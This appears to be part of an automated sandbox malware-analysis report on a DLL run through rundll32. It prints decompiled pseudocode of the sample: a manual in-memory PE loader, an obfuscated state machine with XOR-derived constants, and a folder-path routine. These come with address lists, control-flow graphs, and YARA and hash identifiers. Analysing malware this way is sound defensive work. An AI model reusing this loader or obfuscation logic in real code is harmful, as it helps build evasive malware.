																		_t209 =  *0x10055a88; // 0x0
																		_t278 =  *0x10055a84; // 0x1
																		_t326 =  *0x10055a80; // 0x10000000
																		_v92 = _v96(_t326, _t278, _t209);
																		if(_v92 != 0) {
																			 *((intOrPtr*)(_v72 + 0x10)) = 1;
																			goto L47;
																		}
																		SetLastError(0x45a);
																		L50:
																		E10002840(_v100, _v72);
																		return 0;
																	}
																	goto L50;
																}
																goto L50;
															}
															goto L50;
														}
														goto L50;
													}
													goto L50;
												}
												VirtualFree(_v24, 0, 0x8000);
												SetLastError(0xe);
												return 0;
											}
											_t220 = VirtualAlloc(0, _v28, 0x3000, 4); // executed
											_v24 = _t220;
											if(_v24 != 0) {
												goto L26;
											}
											SetLastError(0xe);
											return 0;
										}
										SetLastError(0xc1);
										return 0;
									}
									SetLastError(0xc1);
									return 0;
								}
								SetLastError(0xc1);
								return 0;
							}
							SetLastError(0xc1);
							return 0;
						}
						return 0;
					}
					SetLastError(0xc1);
					return 0;
				}
				return 0;
			}





























                                                                                                                                    0x10002286
                                                                                                                                    0x10002289
                                                                                                                                    0x10002290
                                                                                                                                    0x100022a7
                                                                                                                                    0x100022b3
                                                                                                                                    0x100022c1
                                                                                                                                    0x100022d8
                                                                                                                                    0x100022f0
                                                                                                                                    0x100022ff
                                                                                                                                    0x10002302
                                                                                                                                    0x1000230e
                                                                                                                                    0x1000232f
                                                                                                                                    0x1000234c
                                                                                                                                    0x1000236e
                                                                                                                                    0x10002377
                                                                                                                                    0x1000237a
                                                                                                                                    0x10002395
                                                                                                                                    0x100023a8
                                                                                                                                    0x100023c4
                                                                                                                                    0x100023aa
                                                                                                                                    0x100023b3
                                                                                                                                    0x100023b3
                                                                                                                                    0x100023cd
                                                                                                                                    0x100023d2
                                                                                                                                    0x100023d2
                                                                                                                                    0x10002389
                                                                                                                                    0x10002392
                                                                                                                                    0x10002392
                                                                                                                                    0x100023db
                                                                                                                                    0x100023ea
                                                                                                                                    0x100023f8
                                                                                                                                    0x10002401
                                                                                                                                    0x10002412
                                                                                                                                    0x10002438
                                                                                                                                    0x1000243e
                                                                                                                                    0x10002445
                                                                                                                                    0x10002472
                                                                                                                                    0x10002483
                                                                                                                                    0x1000248a
                                                                                                                                    0x100024b2
                                                                                                                                    0x100024c4
                                                                                                                                    0x100024cb
                                                                                                                                    0x100024d4
                                                                                                                                    0x100024dd
                                                                                                                                    0x100024e6
                                                                                                                                    0x100024ef
                                                                                                                                    0x100024f8
                                                                                                                                    0x10002510
                                                                                                                                    0x1000252e
                                                                                                                                    0x10002534
                                                                                                                                    0x10002546
                                                                                                                                    0x10002554
                                                                                                                                    0x1000255a
                                                                                                                                    0x10002564
                                                                                                                                    0x1000257a
                                                                                                                                    0x10002581
                                                                                                                                    0x10002598
                                                                                                                                    0x1000259b
                                                                                                                                    0x1000259e
                                                                                                                                    0x100025bb
                                                                                                                                    0x100025a0
                                                                                                                                    0x100025b3
                                                                                                                                    0x100025b3
                                                                                                                                    0x100025d0
                                                                                                                                    0x100025e3
                                                                                                                                    0x100025ea
                                                                                                                                    0x10002604
                                                                                                                                    0x10002616
                                                                                                                                    0x10002680
                                                                                                                                    0x10002687
                                                                                                                                    0x00000000
                                                                                                                                    0x10002687
                                                                                                                                    0x1000261f
                                                                                                                                    0x10002678
                                                                                                                                    0x1000267b
                                                                                                                                    0x00000000
                                                                                                                                    0x1000267b
                                                                                                                                    0x1000262c
                                                                                                                                    0x1000262f
                                                                                                                                    0x10002635
                                                                                                                                    0x1000263c
                                                                                                                                    0x10002646
                                                                                                                                    0x1000264d
                                                                                                                                    0x10002661
                                                                                                                                    0x00000000
                                                                                                                                    0x10002661
                                                                                                                                    0x10002654
                                                                                                                                    0x1000268c
                                                                                                                                    0x10002693
                                                                                                                                    0x00000000
                                                                                                                                    0x10002698
                                                                                                                                    0x00000000
                                                                                                                                    0x10002606
                                                                                                                                    0x00000000
                                                                                                                                    0x100025ec
                                                                                                                                    0x00000000
                                                                                                                                    0x100025d2
                                                                                                                                    0x00000000
                                                                                                                                    0x10002583
                                                                                                                                    0x00000000
                                                                                                                                    0x10002512
                                                                                                                                    0x10002497
                                                                                                                                    0x1000249f
                                                                                                                                    0x00000000
                                                                                                                                    0x100024a5
                                                                                                                                    0x10002454
                                                                                                                                    0x1000245a
                                                                                                                                    0x10002461
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x10002465
                                                                                                                                    0x00000000
                                                                                                                                    0x1000246b
                                                                                                                                    0x10002419
                                                                                                                                    0x00000000
                                                                                                                                    0x1000241f
                                                                                                                                    0x10002353
                                                                                                                                    0x00000000
                                                                                                                                    0x10002359
                                                                                                                                    0x10002336
                                                                                                                                    0x00000000
                                                                                                                                    0x1000233c
                                                                                                                                    0x10002315
                                                                                                                                    0x00000000
                                                                                                                                    0x1000231b
                                                                                                                                    0x00000000
                                                                                                                                    0x100022f2
                                                                                                                                    0x100022c8
                                                                                                                                    0x00000000
                                                                                                                                    0x100022ce
                                                                                                                                    0x00000000

                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 10001990: SetLastError.KERNEL32(0000000D,?,?,100022A5,10012839,00000040), ref: 100019A1
                                                                                                                                    • SetLastError.KERNEL32(000000C1,10012839,00000040), ref: 100022C8
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.464918523.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.464912255.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.464976774.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.464991878.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.465001079.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.465009024.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: ErrorLast
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 1452528299-0
                                                                                                                                    • Opcode ID: 0e09b11d72102b2f53da7248ccc42e4e27664b89a2cf1ce4a90d5e07d10becff
                                                                                                                                    • Instruction ID: 346a8eef4056a92d897d0963d9e5b5a8ca828aef95f805bf3d5880fe5d8ad0e4
                                                                                                                                    • Opcode Fuzzy Hash: 0e09b11d72102b2f53da7248ccc42e4e27664b89a2cf1ce4a90d5e07d10becff
                                                                                                                                    • Instruction Fuzzy Hash: 18E14974A00209DFEB48CF94C990AAEB7F6FF88340F208559E905AB359DB75AD42CF50
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 002CF8FD Relevance: 11.6, Strings: 9, Instructions: 353COMMONCrypto
                                                                                                                                    Download Yara Rule

                                                                                                                                    Control-flow Graph

                                                                                                                                    • Executed
                                                                                                                                    • Not Executed
                                                                                                                                    control_flow_graph 148 2cf8fd-2cfddc 149 2cfde0-2cfde6 148->149 150 2cfdec-2cfdf2 149->150 151 2cffa3-2cffbe call 2c4b61 149->151 152 2cfdf8-2cfdfe 150->152 153 2cffd1-2cffe9 call 2cab87 150->153 164 2cffc3-2cffc9 151->164 156 2cff5e-2cff64 152->156 157 2cfe04-2cfe0a 152->157 159 2cffee-2cfff3 153->159 160 2cff99-2cff9e 156->160 161 2cff66-2cff6a 156->161 162 2cff49-2cff59 call 2cf899 157->162 163 2cfe10-2cfe16 157->163 167 2cfff4-2d0000 159->167 160->149 168 2cff6c-2cff73 161->168 169 2cff91-2cff97 161->169 162->149 170 2cfe8f-2cfeae call 2d46bb 163->170 171 2cfe18-2cfe1e 163->171 164->149 165 2cffcf 164->165 165->167 173 2cff81-2cff8a 168->173 169->160 169->161 176 2cfeb3-2cff44 call 2dda22 call 2ddcf7 call 2c47ce call 2ca8b0 170->176 171->164 175 2cfe24-2cfe5e call 2ddcf7 call 2cb23c 171->175 177 2cff8c-2cff8e 173->177 178 2cff75-2cff79 173->178 185 2cfe63-2cfe8a call 2ca8b0 175->185 176->149 177->169 178->177 181 2cff7b-2cff7e 178->181 181->173 185->164
                                                                                                                                    C-Code - Quality: 80%
                                                                                                                                    			E002CF8FD() {
				char _v520;
				char _v1040;
				char _v1560;
				signed int _v1564;
				signed int _v1568;
				signed int _v1572;
				signed int _v1576;
				signed int _v1580;
				signed int _v1584;
				signed int _v1588;
				signed int _v1592;
				signed int _v1596;
				signed int _v1600;
				signed int _v1604;
				signed int _v1608;
				signed int _v1612;
				signed int _v1616;
				signed int _v1620;
				signed int _v1624;
				signed int _v1628;
				signed int _v1632;
				signed int _v1636;
				signed int _v1640;
				signed int _v1644;
				signed int _v1648;
				signed int _v1652;
				signed int _v1656;
				signed int _v1660;
				signed int _v1664;
				signed int _v1668;
				signed int _v1672;
				signed int _v1676;
				signed int _v1680;
				signed int _v1684;
				signed int _v1688;
				signed int _v1692;
				signed int _v1696;
				signed int _v1700;
				signed short* _t368;
				signed int _t381;
				signed int* _t383;
				signed int _t385;
				signed int _t386;
				signed int _t387;
				signed int _t388;
				signed int _t389;
				signed int _t390;
				signed int _t391;
				signed int _t392;
				signed int _t393;
				signed int _t394;
				signed int _t395;
				signed int _t405;
				signed int* _t438;
				void* _t439;
				signed short* _t445;
				signed int* _t446;

				_t446 =  &_v1700;
				_v1636 = 0x636551;
				_t2 =  &_v1636; // 0x636551
				_t385 = 0x5e;
				_v1636 =  *_t2 / _t385;
				_t383 = 0;
				_t386 = 0x7a;
				_t439 = 0x12dab9f;
				_v1636 = _v1636 * 0x55;
				_v1636 = _v1636 ^ 0x0059e0ec;
				_v1616 = 0x84ec4b;
				_v1616 = _v1616 + 0xffff958e;
				_v1616 = _v1616 << 6;
				_v1616 = _v1616 ^ 0x212f9cfc;
				_v1624 = 0x57c2af;
				_v1624 = _v1624 / _t386;
				_v1624 = _v1624 >> 0xa;
				_v1624 = _v1624 ^ 0x000a9340;
				_v1676 = 0x94d6a3;
				_v1676 = _v1676 >> 3;
				_t387 = 0x41;
				_v1676 = _v1676 * 0x79;
				_v1676 = _v1676 * 0x68;
				_v1676 = _v1676 ^ 0x9280c2f7;
				_v1644 = 0x578290;
				_v1644 = _v1644 | 0x80e552f7;
				_v1644 = _v1644 + 0xffffd80b;
				_v1644 = _v1644 ^ 0x80feae5e;
				_v1652 = 0x70c956;
				_v1652 = _v1652 ^ 0x31ba76f8;
				_v1652 = _v1652 ^ 0x87f2510e;
				_v1652 = _v1652 ^ 0xb63594c0;
				_v1696 = 0x39dcdb;
				_v1696 = _v1696 * 0x22;
				_v1696 = _v1696 >> 0xf;
				_v1696 = _v1696 * 0x75;
				_v1696 = _v1696 ^ 0x000247c6;
				_v1572 = 0x793846;
				_v1572 = _v1572 + 0xfc60;
				_v1572 = _v1572 ^ 0x007fa213;
				_v1576 = 0x3629f6;
				_v1576 = _v1576 | 0x7f6cc17b;
				_v1576 = _v1576 ^ 0x7f7c74a2;
				_v1600 = 0x630dc0;
				_v1600 = _v1600 | 0x8a3170d6;
				_v1600 = _v1600 ^ 0x8a7fe201;
				_v1664 = 0xe79625;
				_v1664 = _v1664 * 0x57;
				_v1664 = _v1664 ^ 0xe47ae09a;
				_v1664 = _v1664 + 0xffff598f;
				_v1664 = _v1664 ^ 0xaac0e7d1;
				_v1648 = 0xac147c;
				_v1648 = _v1648 << 4;
				_v1648 = _v1648 / _t387;
				_v1648 = _v1648 ^ 0x00264750;
				_v1588 = 0x745952;
				_t98 =  &_v1588; // 0x745952
				_v1588 =  *_t98 * 0x3a;
				_v1588 = _v1588 ^ 0x1a53f4d8;
				_v1672 = 0x57a21b;
				_t388 = 0x49;
				_v1672 = _v1672 / _t388;
				_t389 = 0x63;
				_v1672 = _v1672 / _t389;
				_v1672 = _v1672 | 0xd6f4ed27;
				_v1672 = _v1672 ^ 0xd6feee0f;
				_v1620 = 0xc904e8;
				_t390 = 0x17;
				_v1620 = _v1620 * 0x6d;
				_v1620 = _v1620 + 0x178d;
				_v1620 = _v1620 ^ 0x5592dda0;
				_v1688 = 0x59d198;
				_v1688 = _v1688 | 0x5938a823;
				_v1688 = _v1688 ^ 0x788d0eee;
				_v1688 = _v1688 + 0xffff1978;
				_v1688 = _v1688 ^ 0x21fe2fab;
				_v1612 = 0xa097a2;
				_v1612 = _v1612 << 9;
				_v1612 = _v1612 / _t390;
				_v1612 = _v1612 ^ 0x02dc2d90;
				_v1700 = 0xb7b4a0;
				_t391 = 0x36;
				_v1700 = _v1700 / _t391;
				_v1700 = _v1700 >> 1;
				_v1700 = _v1700 | 0xee164e4b;
				_v1700 = _v1700 ^ 0xee1e6de5;
				_v1680 = 0xe4ad14;
				_v1680 = _v1680 | 0xe839ddc8;
				_v1680 = _v1680 ^ 0xfe881b96;
				_t392 = 0x42;
				_v1680 = _v1680 * 0x4e;
				_v1680 = _v1680 ^ 0xd7ed2c6e;
				_v1656 = 0xa710a4;
				_v1656 = _v1656 + 0xfffff8f1;
				_v1656 = _v1656 ^ 0xcc5b21c1;
				_v1656 = _v1656 ^ 0xccf98fb8;
				_v1628 = 0x5fc40d;
				_v1628 = _v1628 + 0xb682;
				_v1628 = _v1628 << 6;
				_v1628 = _v1628 ^ 0x181c8c04;
				_v1640 = 0xd7aa78;
				_v1640 = _v1640 + 0x8e1d;
				_v1640 = _v1640 / _t392;
				_v1640 = _v1640 ^ 0x0007a72a;
				_v1580 = 0xbf48f6;
				_t393 = 0x25;
				_v1580 = _v1580 * 0xd;
				_v1580 = _v1580 ^ 0x09b7b49e;
				_v1564 = 0xff195;
				_v1564 = _v1564 + 0x8c1b;
				_v1564 = _v1564 ^ 0x00104e06;
				_v1684 = 0xbf1e83;
				_v1684 = _v1684 / _t393;
				_t394 = 0x77;
				_v1684 = _v1684 / _t394;
				_v1684 = _v1684 + 0xa662;
				_v1684 = _v1684 ^ 0x0006fc0d;
				_v1596 = 0xc39bae;
				_v1596 = _v1596 << 2;
				_v1596 = _v1596 ^ 0x030cfbaf;
				_v1568 = 0x66568e;
				_v1568 = _v1568 | 0x44ac0d6e;
				_v1568 = _v1568 ^ 0x44e9cf2b;
				_v1692 = 0x3d2b27;
				_v1692 = _v1692 + 0x3fae;
				_t395 = 0x71;
				_v1692 = _v1692 / _t395;
				_v1692 = _v1692 + 0xffff1a11;
				_v1692 = _v1692 ^ 0xffffbf57;
				_v1632 = 0xb4dfda;
				_v1632 = _v1632 * 9;
				_v1632 = _v1632 >> 3;
				_v1632 = _v1632 ^ 0x00c4553b;
				_v1584 = 0x206e7a;
				_v1584 = _v1584 << 7;
				_v1584 = _v1584 ^ 0x10371375;
				_v1592 = 0x689459;
				_v1592 = _v1592 + 0xffffb773;
				_v1592 = _v1592 ^ 0x00637077;
				_v1660 = 0x8b14df;
				_v1660 = _v1660 << 0xd;
				_v1660 = _v1660 + 0x9803;
				_v1660 = _v1660 << 0xa;
				_v1660 = _v1660 ^ 0x71eeeb6f;
				_v1608 = 0x8e767e;
				_v1608 = _v1608 | 0xfaf7fbb6;
				_v1608 = _v1608 ^ 0xfaf9bdf5;
				_v1668 = 0xccd677;
				_v1668 = _v1668 * 0x78;
				_v1668 = _v1668 + 0xffff6b3d;
				_v1668 = _v1668 + 0xf0ff;
				_v1668 = _v1668 ^ 0x600a3b9e;
				_v1604 = 0x7c05f9;
				_v1604 = _v1604 + 0xd55a;
				_v1604 = _v1604 ^ 0x007aedaa;
				_t445 = _v1604;
				while(_t439 != 0x12dab9f) {
					if(_t439 == 0x2f8e73a) {
						_push(_v1604);
						_push(_t383);
						_push(_t395);
						_push(_t383);
						_push(_t383);
						_push(_v1668);
						_push(_t445);
						E002CAB87(_v1660, _v1608, __eflags);
						_t383 = 1;
						__eflags = 1;
						L23:
						return _t383;
					}
					if(_t439 == 0x92208ae) {
						_t368 = _t445;
						__eflags =  *_t445 - _t383;
						if(__eflags == 0) {
							L18:
							_t439 = 0xeef82b0;
							continue;
						} else {
							goto L11;
						}
						do {
							L11:
							__eflags =  *_t368 - 0x2c;
							if( *_t368 != 0x2c) {
								goto L17;
							}
							_t438 =  &_v1560;
							while(1) {
								_t368 =  &(_t368[1]);
								_t405 =  *_t368 & 0x0000ffff;
								__eflags = _t405;
								if(_t405 == 0) {
									break;
								}
								__eflags = _t405 - 0x20;
								if(_t405 == 0x20) {
									break;
								}
								 *_t438 = _t405;
								_t438 =  &(_t438[0]);
								__eflags = _t438;
							}
							_t395 = 0;
							__eflags = 0;
							 *_t438 = 0;
							L17:
							_t368 =  &(_t368[1]);
							__eflags =  *_t368 - _t383;
						} while (__eflags != 0);
						goto L18;
					}
					if(_t439 == 0x99a67ee) {
						_t445 = E002CF899(_t395);
						_t439 = 0x92208ae;
						continue;
					}
					if(_t439 == 0x9e65a83) {
						_push(_v1612);
						_push(_v1636);
						_push(_v1688);
						_push( &_v520); // executed
						E002D46BB(_v1672, _v1620); // executed
						E002DDA22(_v1700, _v1680, __eflags, _v1656,  &_v1040, _v1672, _v1628);
						_push(_v1564);
						_push(_v1580);
						E002C47CE( &_v520, _v1684, _v1640, _v1596, _v1568, E002DDCF7(_v1640, 0x2c1140, __eflags),  &_v1040, _v1692, _v1632);
						_t395 = _v1584;
						E002CA8B0(_t395, _t375, _v1592);
						_t446 = _t446 - 0xc + 0x58;
						_t439 = 0x2f8e73a;
						continue;
					}
					_t457 = _t439 - 0xeef82b0;
					if(_t439 == 0xeef82b0) {
						_push(_v1696);
						_push(_v1652);
						_t381 = E002CB23C(_v1572, _v1576, E002DDCF7(_v1644, 0x2c10c0, _t457), _v1600, _v1664,  &_v1560); // executed
						_t395 = _v1648;
						asm("sbb edi, edi");
						_t439 = ( ~_t381 & 0xfbf501ac) + 0xdf158d7;
						E002CA8B0(_t395, _t379, _v1588);
						_t446 =  &(_t446[7]);
					}
					L20:
					if(_t439 != 0xdf158d7) {
						continue;
					}
					goto L23;
				}
				E002C4B61( &_v1560, 0x208, _v1616, _v1624);
				_pop(_t395);
				_t439 = 0x99a67ee;
				goto L20;
			}




























































                                                                                                                                    0x002cf8fd
                                                                                                                                    0x002cf903
                                                                                                                                    0x002cf90d
                                                                                                                                    0x002cf917
                                                                                                                                    0x002cf91c
                                                                                                                                    0x002cf927
                                                                                                                                    0x002cf929
                                                                                                                                    0x002cf92c
                                                                                                                                    0x002cf931
                                                                                                                                    0x002cf935
                                                                                                                                    0x002cf93d
                                                                                                                                    0x002cf945
                                                                                                                                    0x002cf94d
                                                                                                                                    0x002cf952
                                                                                                                                    0x002cf95a
                                                                                                                                    0x002cf96a
                                                                                                                                    0x002cf96e
                                                                                                                                    0x002cf973
                                                                                                                                    0x002cf97b
                                                                                                                                    0x002cf983
                                                                                                                                    0x002cf98d
                                                                                                                                    0x002cf98e
                                                                                                                                    0x002cf997
                                                                                                                                    0x002cf99b
                                                                                                                                    0x002cf9a3
                                                                                                                                    0x002cf9ab
                                                                                                                                    0x002cf9b3
                                                                                                                                    0x002cf9bb
                                                                                                                                    0x002cf9c3
                                                                                                                                    0x002cf9cb
                                                                                                                                    0x002cf9d3
                                                                                                                                    0x002cf9db
                                                                                                                                    0x002cf9e3
                                                                                                                                    0x002cf9f0
                                                                                                                                    0x002cf9f4
                                                                                                                                    0x002cf9fe
                                                                                                                                    0x002cfa02
                                                                                                                                    0x002cfa0a
                                                                                                                                    0x002cfa15
                                                                                                                                    0x002cfa20
                                                                                                                                    0x002cfa2b
                                                                                                                                    0x002cfa36
                                                                                                                                    0x002cfa41
                                                                                                                                    0x002cfa4c
                                                                                                                                    0x002cfa54
                                                                                                                                    0x002cfa5c
                                                                                                                                    0x002cfa64
                                                                                                                                    0x002cfa71
                                                                                                                                    0x002cfa75
                                                                                                                                    0x002cfa7d
                                                                                                                                    0x002cfa85
                                                                                                                                    0x002cfa8d
                                                                                                                                    0x002cfa95
                                                                                                                                    0x002cfaa0
                                                                                                                                    0x002cfaa4
                                                                                                                                    0x002cfaac
                                                                                                                                    0x002cfab7
                                                                                                                                    0x002cfabf
                                                                                                                                    0x002cfac6
                                                                                                                                    0x002cfad1
                                                                                                                                    0x002cfae1
                                                                                                                                    0x002cfae6
                                                                                                                                    0x002cfaf0
                                                                                                                                    0x002cfaf5
                                                                                                                                    0x002cfafb
                                                                                                                                    0x002cfb03
                                                                                                                                    0x002cfb0b
                                                                                                                                    0x002cfb18
                                                                                                                                    0x002cfb1b
                                                                                                                                    0x002cfb1f
                                                                                                                                    0x002cfb27
                                                                                                                                    0x002cfb2f
                                                                                                                                    0x002cfb37
                                                                                                                                    0x002cfb3f
                                                                                                                                    0x002cfb47
                                                                                                                                    0x002cfb4f
                                                                                                                                    0x002cfb57
                                                                                                                                    0x002cfb5f
                                                                                                                                    0x002cfb6c
                                                                                                                                    0x002cfb70
                                                                                                                                    0x002cfb78
                                                                                                                                    0x002cfb84
                                                                                                                                    0x002cfb89
                                                                                                                                    0x002cfb8f
                                                                                                                                    0x002cfb93
                                                                                                                                    0x002cfb9b
                                                                                                                                    0x002cfba3
                                                                                                                                    0x002cfbab
                                                                                                                                    0x002cfbb3
                                                                                                                                    0x002cfbc0
                                                                                                                                    0x002cfbc3
                                                                                                                                    0x002cfbc7
                                                                                                                                    0x002cfbcf
                                                                                                                                    0x002cfbd7
                                                                                                                                    0x002cfbdf
                                                                                                                                    0x002cfbe7
                                                                                                                                    0x002cfbef
                                                                                                                                    0x002cfbf7
                                                                                                                                    0x002cfbff
                                                                                                                                    0x002cfc04
                                                                                                                                    0x002cfc0c
                                                                                                                                    0x002cfc14
                                                                                                                                    0x002cfc24
                                                                                                                                    0x002cfc28
                                                                                                                                    0x002cfc30
                                                                                                                                    0x002cfc43
                                                                                                                                    0x002cfc44
                                                                                                                                    0x002cfc4b
                                                                                                                                    0x002cfc56
                                                                                                                                    0x002cfc61
                                                                                                                                    0x002cfc6c
                                                                                                                                    0x002cfc77
                                                                                                                                    0x002cfc87
                                                                                                                                    0x002cfc91
                                                                                                                                    0x002cfc96
                                                                                                                                    0x002cfc9c
                                                                                                                                    0x002cfca4
                                                                                                                                    0x002cfcac
                                                                                                                                    0x002cfcb4
                                                                                                                                    0x002cfcb9
                                                                                                                                    0x002cfcc1
                                                                                                                                    0x002cfccc
                                                                                                                                    0x002cfcd7
                                                                                                                                    0x002cfce2
                                                                                                                                    0x002cfcea
                                                                                                                                    0x002cfcf6
                                                                                                                                    0x002cfcf9
                                                                                                                                    0x002cfcfd
                                                                                                                                    0x002cfd05
                                                                                                                                    0x002cfd0d
                                                                                                                                    0x002cfd1a
                                                                                                                                    0x002cfd1e
                                                                                                                                    0x002cfd23
                                                                                                                                    0x002cfd2b
                                                                                                                                    0x002cfd36
                                                                                                                                    0x002cfd3e
                                                                                                                                    0x002cfd49
                                                                                                                                    0x002cfd51
                                                                                                                                    0x002cfd59
                                                                                                                                    0x002cfd61
                                                                                                                                    0x002cfd69
                                                                                                                                    0x002cfd6e
                                                                                                                                    0x002cfd76
                                                                                                                                    0x002cfd7b
                                                                                                                                    0x002cfd83
                                                                                                                                    0x002cfd8b
                                                                                                                                    0x002cfd93
                                                                                                                                    0x002cfd9b
                                                                                                                                    0x002cfda8
                                                                                                                                    0x002cfdac
                                                                                                                                    0x002cfdb4
                                                                                                                                    0x002cfdbc
                                                                                                                                    0x002cfdc4
                                                                                                                                    0x002cfdcc
                                                                                                                                    0x002cfdd4
                                                                                                                                    0x002cfddc
                                                                                                                                    0x002cfde0
                                                                                                                                    0x002cfdf2
                                                                                                                                    0x002cffd1
                                                                                                                                    0x002cffd5
                                                                                                                                    0x002cffd6
                                                                                                                                    0x002cffd7
                                                                                                                                    0x002cffd8
                                                                                                                                    0x002cffd9
                                                                                                                                    0x002cffe8
                                                                                                                                    0x002cffe9
                                                                                                                                    0x002cfff3
                                                                                                                                    0x002cfff3
                                                                                                                                    0x002cfff7
                                                                                                                                    0x002d0000
                                                                                                                                    0x002d0000
                                                                                                                                    0x002cfdfe
                                                                                                                                    0x002cff5e
                                                                                                                                    0x002cff60
                                                                                                                                    0x002cff64
                                                                                                                                    0x002cff99
                                                                                                                                    0x002cff99
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x002cff66
                                                                                                                                    0x002cff66
                                                                                                                                    0x002cff66
                                                                                                                                    0x002cff6a
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x002cff6c
                                                                                                                                    0x002cff81
                                                                                                                                    0x002cff81
                                                                                                                                    0x002cff84
                                                                                                                                    0x002cff87
                                                                                                                                    0x002cff8a
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x002cff75
                                                                                                                                    0x002cff79
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x002cff7b
                                                                                                                                    0x002cff7e
                                                                                                                                    0x002cff7e
                                                                                                                                    0x002cff7e
                                                                                                                                    0x002cff8c
                                                                                                                                    0x002cff8c
                                                                                                                                    0x002cff8e
                                                                                                                                    0x002cff91
                                                                                                                                    0x002cff91
                                                                                                                                    0x002cff94
                                                                                                                                    0x002cff94
                                                                                                                                    0x00000000
                                                                                                                                    0x002cff66
                                                                                                                                    0x002cfe0a
                                                                                                                                    0x002cff52
                                                                                                                                    0x002cff54
                                                                                                                                    0x00000000
                                                                                                                                    0x002cff54
                                                                                                                                    0x002cfe16
                                                                                                                                    0x002cfe8f
                                                                                                                                    0x002cfe9a
                                                                                                                                    0x002cfe9e
                                                                                                                                    0x002cfead
                                                                                                                                    0x002cfeae
                                                                                                                                    0x002cfecf
                                                                                                                                    0x002cfed4
                                                                                                                                    0x002cfee0
                                                                                                                                    0x002cff22
                                                                                                                                    0x002cff2e
                                                                                                                                    0x002cff37
                                                                                                                                    0x002cff3c
                                                                                                                                    0x002cff3f
                                                                                                                                    0x00000000
                                                                                                                                    0x002cff3f
                                                                                                                                    0x002cfe18
                                                                                                                                    0x002cfe1e
                                                                                                                                    0x002cfe24
                                                                                                                                    0x002cfe2d
                                                                                                                                    0x002cfe5e
                                                                                                                                    0x002cfe6a
                                                                                                                                    0x002cfe74
                                                                                                                                    0x002cfe7c
                                                                                                                                    0x002cfe82
                                                                                                                                    0x002cfe87
                                                                                                                                    0x002cfe87
                                                                                                                                    0x002cffc3
                                                                                                                                    0x002cffc9
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x002cffcf
                                                                                                                                    0x002cffb7
                                                                                                                                    0x002cffbd
                                                                                                                                    0x002cffbe
                                                                                                                                    0x00000000

                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.464808022.00000000002C1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002C0000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.464801297.00000000002C0000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.464824952.00000000002E3000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_2c0000_rundll32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: FolderPath
                                                                                                                                    • String ID: '+=$F8y$PG&$Qec$RYt$oq$wpc$zn $Y
                                                                                                                                    • API String ID: 1514166925-3316477785
                                                                                                                                    • Opcode ID: 3de381f1716e38af5a1119eb2e118db8b9bfdea8e4311385d14d93c56549cd40
                                                                                                                                    • Instruction ID: fd85ee7585f43aa7cb1c067736e26c85832bf607846a98642a2f2017cbaa048d
                                                                                                                                    • Opcode Fuzzy Hash: 3de381f1716e38af5a1119eb2e118db8b9bfdea8e4311385d14d93c56549cd40
                                                                                                                                    • Instruction Fuzzy Hash: B70210725183818FD368CF25C58AA1BBBE2FBC5718F108A1DF199862A0D7B58959CF43
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 002CE991 Relevance: 2.6, Strings: 2, Instructions: 68COMMONCrypto
                                                                                                                                    Download Yara Rule

                                                                                                                                    Control-flow Graph

                                                                                                                                    • Executed
                                                                                                                                    • Not Executed
                                                                                                                                    control_flow_graph 267 2ce991-2cea60 268 2cea90-2cea96 267->268 269 2cea62-2cea77 call 2cf8fd 267->269 269->268 272 2cea79-2cea88 call 2c93ed 269->272 274 2cea8d 272->274 274->268
                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                    			_entry_(intOrPtr _a4, char _a8) {
				unsigned int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				signed int _t85;
				signed int _t86;
				signed int _t87;

				_v32 = _v32 & 0x00000000;
				_v44 = 0xa88528;
				_v40 = 0x811176;
				_v36 = 0xed2c64;
				_v20 = 0x893932;
				_v20 = _v20 ^ 0x2faf083b;
				_v20 = _v20 ^ 0x2f2d1c53;
				_v8 = 0xbe2d1;
				_t85 = 0x2e;
				_v8 = _v8 / _t85;
				_v8 = _v8 >> 0xd;
				_v8 = _v8 + 0xffff961f;
				_v8 = _v8 ^ 0xfff451d0;
				_v16 = 0x50855f;
				_v16 = _v16 >> 8;
				_t86 = 0x5e;
				_v16 = _v16 / _t86;
				_v16 = _v16 ^ 0x0002614f;
